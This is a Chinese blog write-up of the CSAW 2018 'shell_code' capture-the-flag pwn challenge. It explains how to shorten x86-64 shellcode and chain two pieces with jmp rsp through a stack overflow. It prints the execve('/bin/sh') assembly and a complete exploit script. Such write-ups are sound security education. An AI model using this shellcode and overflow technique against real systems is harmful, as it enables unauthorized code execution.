利用rsp进行shellcode跳转&&缩短shellcode&&csaw2018_shell_code

最新推荐文章于 2023-10-20 21:56:43 发布
最新推荐文章于 2023-10-20 21:56:43 发布
阅读量479 收藏 2
点赞数 1
分类专栏: linux_pwn 文章标签: c语言 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/123954708
版权

文章目录

最近做了挺多这种缩短shellcode的题目,其实大概思想就是要利用现有的寄存器条件缩短shellcode,当然还是有一些基础的缩短shellcode的方法,用push pop来替换mov

csaw2018_shell_code

csaw2018_shell_code

题目分析

题目保护

在这里插入图片描述
栈可执行

漏洞

在这里插入图片描述

这两个地方可以填入shellcode
在这里插入图片描述
这里有个告诉栈地址
在这里插入图片描述
栈溢出

攻击

最开始想用一个块来打shellcode,但还是差一点,这里我用了两次shellcode
由于我们栈溢出之后,rsp会指向ret addr后面,所以只要不改变栈的大概偏移,就可以利用jmp rsp跳转

这里当时观察了一下栈结构,这里的栈溢出的地方会覆盖一点点第二块,所以我用第一块来作为第一次执行,最后jmp rsp跳转到栈溢出的地方

第一块的shellcode

shellcode = """
mov rax,0x68732F2F6E69622F; #10
xor rsi,rsi;# 3
jmp rsp;#2
"""

这里其实可以观察rsi,rdx,如果哪个可以只用xor esi来清零,就用哪个
刚好15长度

栈溢出的shellcode

sla(b"initials?\n", b"3" * (3 + 8) + p64(stack_addr + 0x28) + asm(shellcode3))

根据计算,栈溢出后面还可以写13个长度

shellcode3 = """
push rsi; #1 作为0截断字符串
push rax;#1
mov rdi,rsp;#3
push rsi;#1
pop rdx;#1
push 0x3b;#2
pop rax;#1
syscall;#2
"""

刚好够用

allpayload

bin_sh = 0x68732F2F6E69622F
shellcode = """
mov rax,0x68732F2F6E69622F;
xor rsi,rsi;
jmp rsp;
"""

shellcode3 = """
push rsi;
push rax;
mov rdi,rsp;
push rsi;
pop rdx;
push 0x3b;
pop rax;
syscall;
"""

sla(b"node 1:  \n", asm(shellcode))
sla(b"node 2: \n", b"")
ru(b"node.next: ")
stack_addr = int(rld(), 16)
sla(b"initials?\n", b"3" * (3 + 8) + p64(stack_addr + 0x28) + asm(shellcode3))
it()
azraelxuemo
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode 题解
lifanxin的博客
11-29 1320
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本一些细节:wp_shellcode.py 知识点关键字 栈溢出,shellcode拆分+组装 样本 样本来自2018年CSAWCTF的pwn题目shellcode 运行 检查文件,发现有两个可以利用的点:   栈溢出保护未开启;   NX保护未开启,存在RWX段。 $ checksec CSAWCTF-2018-pwn [*] '/home/fanxinli/pwnSample/CSAWCTF-2018/CSAWCTF-2018-pwn'
db_install.rsp
05-16
oracle 12c 静默安装数据库,db_install.rsp 已经修改过的模板文件,可以直接使用
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
★pwn 手写Shellcode保姆级教程★
最新发布
YX-hueimie
10-20 2809
本文章为手写Shellcode的教程,本文章将会围绕 NewStarCTF 2023 WEEK2 中的shellcode revenge一题展开,深入浅出带你一起编写shellcode。学完本文章,你将会有以下收获:加深对shellcode的理解,提升shellcode的编写能力,提升汇编能力,熟练掌握“异或”操作。
[极客大挑战 2019]Not Bad刷题
qq_43766802的博客
09-28 458
检查下程序的保护措施 拖入ida发现程序打开了沙盒保护,随即用seccomp-tools工具查看下白名单 因此这题选择用orw来get flag 函数允许我们输入0x38个字节,但buf只有0x20大小,并且只能溢出0x18个字节,用buf来装orw的汇编代码是绝对不够的,但程序一开始mmap了内存中的一段区域,我们可以利用这段区域来保存我们的shellcode,并发现该程序有jmp rsp利用jmp rsp可以直接执行栈上的内容 write up from pwn import..
BUUCTF刷题5
m0_51251108的博客
10-30 551
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
rsp.rar_V2 _rsp
09-23
本文将深入探讨“rsp.rar_V2_rsp”主题,主要关注Linux v2.13.6版本下的NCI响应包处理,并基于提供的压缩文件“rsp.c”来解析相关知识点。 首先,NCI是NFC(近场通信)规范的一部分,它定义了如何在NFC设备之间交换...
rsp系统profile参考材料.zip_rsp系统 profile依据
09-23
Profile在RSP系统中可以被理解为一种配置模板或标准,它定义了系统如何与不同的服务、设备以及网络元素进行交互。Profile的目的是确保不同供应商的解决方案能够无缝协作,实现互操作性,从而提高整个网络的灵活性和...
esim.zip_ESIM_card specification_esim开发_euicc rsp规范sgp_智能卡
09-20
3. SGP.22(RSP Technical Spec)_v2.1.pdf:RSP(Remote Subscription Profile)技术规格文档,详细说明了如何远程管理和更新eSIM的订阅配置。v2.1版本可能包含对远程更新流程的改进,确保用户可以更方便地切换运营商...
freq_rsp.zip_rsp
07-14
its goood function for vibration FREQ
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
nasm用c语言调用汇编输出所有的函数参数
fantasy_ARM9的博客
06-28 547
汇编入门
linux环境下常见漏洞利用技术,linux常见漏洞利用技术实践
weixin_33411550的博客
05-10 475
0x01 前言1.1 目的1.1.1 写这篇文章一是总结一下前段时间所学的东西,二是给pwn还没入门的同学一些帮助,毕竟自己学的时候还是遇到不少困难以下都是我的实际操作,写的比较详细,包含了我自己的一些经验,欢迎大家指点.1.1.2 内容包含利用跳板劫持流程,GOT覆写 ,ret2libc等技术1.2 预备1.2.1工具1.2.1.1 ida反汇编神器,下载地址down.52pojie.cn1.2...
汇编指令,认识一下
luyaran的博客
09-30 3604
汇编指令与高级编程语言一样,汇编语言也是一门完整的计算机编程语言,其涉及到的内容和知识点有很多,本文会介绍汇编语言下的子集-汇编指令,旨在让各位看完本文之后有能力读懂goroutine调度器中的汇编代码。 聊汇编指令之前,先聊一下机器指令。 二进制的机器指令才是CPU能够读懂的机器语言,因其是二进制格式的,非常便于CPU解析和执行,但对编程人员来说不是很友好,所以才有与机器指令相对应的汇编指令,它使用符号来表示机器指令。 看个例子感受下: 0x40054d : add %rdx,%rax //
nasm汇编处理输入参数
fantasy_ARM9的博客
10-21 483
GLOBAL main extern puts SECTION .text main: push rdi;save registers that puts uses 保存参数个数 push rsi; 保存参数字符串指针数组, sub rsp, 8; must align stack before call 进入函数的时候,call 保留了下一条指令到栈里面 mov rdi, [rsi]; the augument string todisplay 字符串指针数组首地址 存入r...
push,你到底做了啥事情????
DevX's brew
04-21 4422
事情要一件一件来说,就像吃饭要一口一口吃一样。一共有两件事情,这节就先讲push的事情。 问一句,push, what the hell are u doing? 启动bochs,开始push stack之旅。 截取一部分源码: protect: ;[7].进入到保护模式后,为了给予内核最大的访问内存能力,ds段寄存器使用4G段描述符 ;初始化ds mov eax, 0x000
csapp attack lab实验总结
qq_25044201的博客
12-10 937
这5个实验都可以说是栈溢出然后修改ret地址而进行的一系列攻击操作。对于前三个可以代码注入的实验来说。 1.考虑shellcode的编写地址位置,shellcode写在哪是关键。 (1)如果要溢出的栈帧开辟的足够大,那就写在这个要溢出的栈帧中,然后在调用当前栈帧的rsp作为shellcode的地址。 (2)如果开辟的栈帧空间较小,那么考虑在上一个栈帧写shellcode 根据jmp rsp(这个rsp是上一个栈帧的rsp)或者根据已知一个buf的地址加偏移量作为shellcode的地址。 2.所调用的函数完
【广东大学生网络攻防大赛-WriteUp(非官方)】Pwn | jmp_rsp
ZXW_NUDT的博客
05-23 409
from pwn import * from ctypes import * from LibcSearcher import * context.log_level = 'debug' context.arch='amd64' io=remote('47.106.122.102',48752) rl=lambda a=False :io.recvline(a) ru=lambda a,b=True :io.recvuntil(a,b) rn=lambda x :io.sendline(x) sn=lamb
wire [ROWBUF_IDX_W-1:0] lbuf_cnt_r; wire [ROWBUF_IDX_W-1:0] lbuf_cnt_nxt; wire lbuf_cnt_clr; wire lbuf_cnt_incr; wire lbuf_cnt_ena; wire lbuf_cnt_last; wire lbuf_icb_rsp_hsked; wire nice_rsp_valid_lbuf; wire nice_icb_cmd_valid_lbuf; assign lbuf_icb_rsp_hsked = state_is_lbuf & nice_icb_rsp_hsked; assign lbuf_icb_rsp_hsked_last = lbuf_icb_rsp_hsked & lbuf_cnt_last; assign lbuf_cnt_last = (lbuf_cnt_r == clonum); assign lbuf_cnt_clr = custom3_lbuf & nice_req_hsked; assign lbuf_cnt_incr = lbuf_icb_rsp_hsked & ~lbuf_cnt_last; assign lbuf_cnt_ena = lbuf_cnt_clr | lbuf_cnt_incr; assign lbuf_cnt_nxt = ({ROWBUF_IDX_W{lbuf_cnt_clr }} & {ROWBUF_IDX_W{1'b0}}) | ({ROWBUF_IDX_W{lbuf_cnt_incr}} & (lbuf_cnt_r + 1'b1) ) ; sirv_gnrl_dfflr #(ROWBUF_IDX_W) lbuf_cnt_dfflr (lbuf_cnt_ena, lbuf_cnt_nxt, lbuf_cnt_r, nice_clk, nice_rst_n); // nice_rsp_valid wait for nice_icb_rsp_valid in LBUF assign nice_rsp_valid_lbuf = state_is_lbuf & lbuf_cnt_last & nice_icb_rsp_valid; // nice_icb_cmd_valid sets when lbuf_cnt_r is not full in LBUF assign nice_icb_cmd_valid_lbuf = (state_is_lbuf & (lbuf_cnt_r < clonum));详细讲解这段代码
06-02
这段代码是一些 Verilog 代码,用于...其中,nice_rsp_valid_lbuf 的值表示当前逻辑缓冲区中的所有元素是否已经被处理完毕,而 nice_icb_cmd_valid_lbuf 的值则表示当前逻辑缓冲区是否还有空闲的位置可以存储新的元素。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值